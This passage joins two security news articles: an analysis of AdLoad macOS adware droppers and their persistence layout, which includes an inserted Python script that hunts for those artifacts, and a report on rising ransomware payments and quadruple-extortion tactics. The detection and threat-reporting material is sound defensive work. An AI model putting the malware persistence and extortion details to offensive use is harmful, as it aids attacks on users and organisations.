    That bundle contains an executable dropper with the same name. There’s also a hidden tracker file called .logg that contains a universally unique identifier (UUID) for the victim; it’s also included in the Application Support folder, Stokes said.

    The droppers are slightly obfuscated Zsh scripts which unpack themselves several times before finally executing the malware (a shell script) out of the /tmp directory, he noted. Many of them are signed or notarized.

    “Typically, we observe that developer certificates used to sign the droppers are revoked by Apple within a matter of days (sometimes hours) of samples being observed on VirusTotal, offering some belated and temporary protection against further infections by those particular signed samples by means of Gatekeeper and OCSP signature checks,” Stokes said. “Also typically, we see new samples signed with fresh certificates appearing within a matter of hours and days. Truly, it is a game of whack-a-mole.”

    In any event, “the final payload isn’t known to the current version of Apple’s XProtect, v2149,” he explained.
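A hunting script for the on-disk layout described in the infection routine above, as an added example that is not SentinelLabs’ code: it checks a home directory for LaunchAgents named with the .system/.service pattern or pointing into Application Support/<name>/Services/, for app bundles in such a Services folder, and for the hidden .logg tracker file. The sample tree is constructed in a temporary directory so the script runs anywhere.

```python
"""Hunt a user home directory for the AdLoad persistence layout. Added example;
the sample tree and the names in it are constructed, not real indicators."""
import plistlib
import tempfile
from pathlib import Path

SUSPICIOUS_EXT = (".system", ".service")   # agent naming reported in the article

def hunt(home: Path) -> dict:
    """Return paths under `home` matching the article's persistence layout."""
    hits = {"launch_agents": [], "service_bundles": [], "tracker_files": []}
    agents = home / "Library" / "LaunchAgents"
    for plist in (agents.glob("*.plist") if agents.is_dir() else []):
        stem = plist.name[: -len(".plist")]
        try:
            args = plistlib.loads(plist.read_bytes()).get("ProgramArguments", [])
        except Exception:           # unreadable plist: skip rather than abort the sweep
            args = []
        target = args[0] if args else ""
        # Flag either the .system/.service label or a program launched out of
        # Application Support/<name>/Services/.
        if stem.endswith(SUSPICIOUS_EXT) or (
                "/Application Support/" in target and "/Services/" in target):
            hits["launch_agents"].append(str(plist))
    appsup = home / "Library" / "Application Support"
    if appsup.is_dir():
        for vendor in appsup.iterdir():
            services = vendor / "Services"
            if services.is_dir():   # minimal app bundle holding the dropper
                hits["service_bundles"] += [str(b) for b in services.glob("*.app")]
        hits["tracker_files"] = [str(p) for p in appsup.rglob(".logg")]  # hidden UUID file
    return hits

def build_sample_home(populate: bool = True) -> Path:
    """Constructed sample: an infected-looking home directory, or an empty one."""
    home = Path(tempfile.mkdtemp())
    if not populate:
        return home
    agents = home / "Library" / "LaunchAgents"
    svc = home / "Library" / "Application Support" / "Example" / "Services"
    agents.mkdir(parents=True); svc.mkdir(parents=True)
    (svc / "com.Example.service.app").mkdir()
    (svc.parent / ".logg").write_text("00000000-0000-0000-0000-000000000000\n")  # placeholder UUID
    (agents / "com.Example.service.plist").write_bytes(plistlib.dumps(
        {"Label": "com.Example.service", "RunAtLoad": True,
         "ProgramArguments": [str(svc / "com.Example.service")]}))
    (agents / "com.vendor.updater.plist").write_bytes(plistlib.dumps(   # benign agent
        {"Label": "com.vendor.updater", "ProgramArguments": ["/usr/bin/true"]}))
    return home

if __name__ == "__main__":
    for kind, paths in hunt(build_sample_home()).items():
        print(kind, paths)
```

Point hunt() at a real home directory (Path.home()) to sweep a Mac; a hit in all three lists together is the combination the article describes.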

    Capitalizing on Apple XProtect Gaps

    SentinelLabs’ researchers observed the latest AdLoader samples used in campaigns starting as early as November of last year, but it wasn’t until this summer – July and August in particular – that the volume of attacks and samples began to tick up sharply.

    “It certainly seems possible that the malware developers are taking advantage of the gap in XProtect…At the time of writing, XProtect was last updated to version 2149 around June 15 – 18,” Stokes said, adding that the malware does have a high detection rate in VirusTotal. “The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple’s built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices.”


    Unit 42 puts the average payout at over half a million, while Barracuda has tracked a 64 percent year over year spike in the number of attacks.

    Two reports slap hard figures on what’s already crystal clear: Ransomware attacks have skyrocketed, and ransomware payments are the comet trails that have followed them skyward.

    The average ransomware payment spiked 82 percent year over year: It’s now over half a million dollars, according to the first-half 2021 update report put out by Palo Alto Networks’ Unit 42. As far as the sheer multitude of attacks goes, Barracuda researchers on Thursday reported that they’ve identified and analyzed 121 ransomware incidents so far in 2021, a 64 percent increase in attacks, year-over-year.

    What’s helped to intensify extortion payments is the fact that cybercriminals have been pouring money into “highly profitable ransomware operations,” Unit 42 researchers wrote, including a new, disturbing trend: The rise of “quadruple extortion.”

    Thumbscrews Have Quadrupled

    Double extortion has been around for more than a year: That’s when threat actors not only paralyze a victim’s systems and/or data but also threaten to leak compromised data or use it in future spam attacks if victims balk at paying extortion demands.

    But during the first half of 2021, Unit 42 researchers observed ransomware groups commonly using as many as four techniques to turn the thumbscrews on victims, adding denial-of-service (DoS) attacks and harassment of a victim’s connections to the pain:

    • Encryption: Victims pay to regain access to scrambled data and compromised computer systems that stop working because key files are encrypted.
    • Data Theft: Hackers release sensitive information if a ransom is not paid.
    • DoS: Ransomware gangs launch DoS attacks that shut down a victim’s public websites.
    • Harassment: Cybercriminals contact customers, business partners, employees and media to tell them the organization was hacked.

    These “increasingly aggressive” tactics have fattened ransoms that were already increasingly engorged. Unit 42 reported last year that the average payment last year had surged 171 percent, to more than $312,000. During the first half of this year, that shot up to a record $570,000.

    “While it’s rare for one organization to be the victim of all four techniques, this year we have increasingly seen ransomware gangs engage in additional approaches when victims don’t pay up after encryption and data theft,” Unit 42 reported.

    “Among the dozens of cases that Unit 42 consultants reviewed in the first half of 2021, the average ransom demand was $5.3 million. That’s up 518 percent from the 2020 average of $847,000,” researchers observed.

    More statistics include the highest ransom demand of a single victim spotted by Unit 42, which rose to $50 million in the first half of 2021, up from $30 million last year. So far this year, the largest payment confirmed by Unit 42 was the $11 million that JBS SA disclosed after a massive attack in June. Last year, the largest payment Unit 42 observed was $10 million.

    Barracuda has also tracked a spike in ransom demands: In the attacks that it’s observed, the average ransom ask per incident was more than $10 million, with only 18 percent of the incidents involving a ransom demand of less than that. Meanwhile 30 percent of the incidents had greater than $30 million ransom asks.

    But for its part, Barracuda traced the cause of spiked extortion demands to the wider adoption of cryptocurrency. It said that this increased prevalence of cryptocurrency has led to “a correlation of increased ransomware attacks and higher ransom amounts. With increased crackdown on bitcoin and successful tracing of transactions, criminals are starting to provide alternative payment methods, such as the REvil ransomware gang asking for Monero instead of Bitcoin.”

    REvil’s New Tactic: Dangling a Pricey Decryptor Key

    Unit 42 researchers also alluded to a new tactic that REvil pulled out of its hat: After attacking Kaseya and its customers, REvil operators offered to sell a universal decryption key that would unlock all organizations affected by the attack, for $70 million – an asking price it quickly dropped to $50 million.

    That would have helped a lot of Kaseya’s customers, many of which were managed service providers (MSPs) that use the company’s VSA product. At least 60 customers in 22 countries were hit in the spate of worldwide cyberattacks on July 2. Eventually, Kaseya did get its hands on a decryptor, but it’s not clear how much it paid, if anything. (A purported master key was leaked online earlier this week, but researchers said that the decryptor is of little use to other companies hit in the attacks, which were unleashed before the notorious ransomware group went dark.)

    Barter Hard

    The drop in asking price for REvil’s decryptor is mirrored by other instances of shrinking ransom demands. Barracuda pointed out several instances of ransomware gangs responding to negotiation tactics, including:

    • JBS negotiated a $22.5 million ransom payment down to $11 million.
    • Brenntag, a chemical distributor in Germany, negotiated a $7.5 million ransom demand down to $4.4 million.

    “The initial ransom ask may not be the final ask, so if they’re planning to pay, it is important for ransomware victims to exercise negotiation options,” according to Barracuda’s Fleming Shi. “The outcome can be savings in the millions.”

    Who’s Getting Picked On

    In his Thursday post, Shi said that the ransomware thugs are picking on victims of all sizes. “The grim outlook for the future of ransomware leaves no one spared from financial damage or brand-crushing headlines,” Shi wrote. “Ransomware criminals are penetrating the foundation of our digital economy, from trusted software vendors to IT service providers.”

    While ransomware gangs are still “heavily targeting” municipalities, healthcare and education, attacks on other businesses are “surging,” the researcher said. “Attacks on corporations, such as infrastructure, travel, financial services, and other businesses, made up 57 percent of all ransomware attacks between August 2020 and July 2021, up from just 18 percent in our 2020 study. Infrastructure-related businesses account for 10 percent of all the attacks we studied.”

    After analyzing more than 120 incidents from August 2020 until July 2021, Barracuda’s research team found that ransomware attacks increased 64 percent year over year, and that REvil and DarkSide were responsible for 27 percent of those attacks.

    A multiplier effect is brought into play, given that ransomware attacks are “quickly evolving to software supply-chain attacks, which reach more businesses in a single attempt,” Shi explained, with Kaseya being just one case in point. Others are the airline industry and the JBS Foods attacks, the latter of which led to the meat supplier being forced to shut down operations in the U.S. and Australia.

    Source: Barracuda.

    While the U.S. is still in attackers’ crosshairs, Barracuda found that ransomware attacks are proliferating across the globe. “Just under half of the attacks in the past 12 months hit U.S. organizations (44 percent). In comparison, 30 percent of the incidents happened in EMEA, 11 percent were in Asia Pacific countries, 10 percent were in South America, and 8 percent were in Canada and Mexico,” Shi said.

    Source: Barracuda.

    The Ransomware Crystal Ball

    Unit 42 predicted that ransom demands will continue to spiral upwards, but that some gangs will continue to focus on smaller businesses that can’t afford to invest heavily in cybersecurity defenses.

    “So far this year, we have observed groups, including NetWalker, SunCrypt and LockBit, demanding and taking in payments ranging from $10,000 to $50,000,” researchers noted. “While they may seem small compared to the largest ransoms we observed, payments that size can have a debilitating impact on a small organization.”

    Unit 42 also expected to see more targeting of hypervisors, given that this can lead to corruption of multiple virtual instances running on a single server. One example was seen last month, when researchers observed a Linux variant of REvil ransomware targeting VMware’s ESXi virtual machine management software and network attached storage (NAS) devices that run on the Linux operating system (OS).
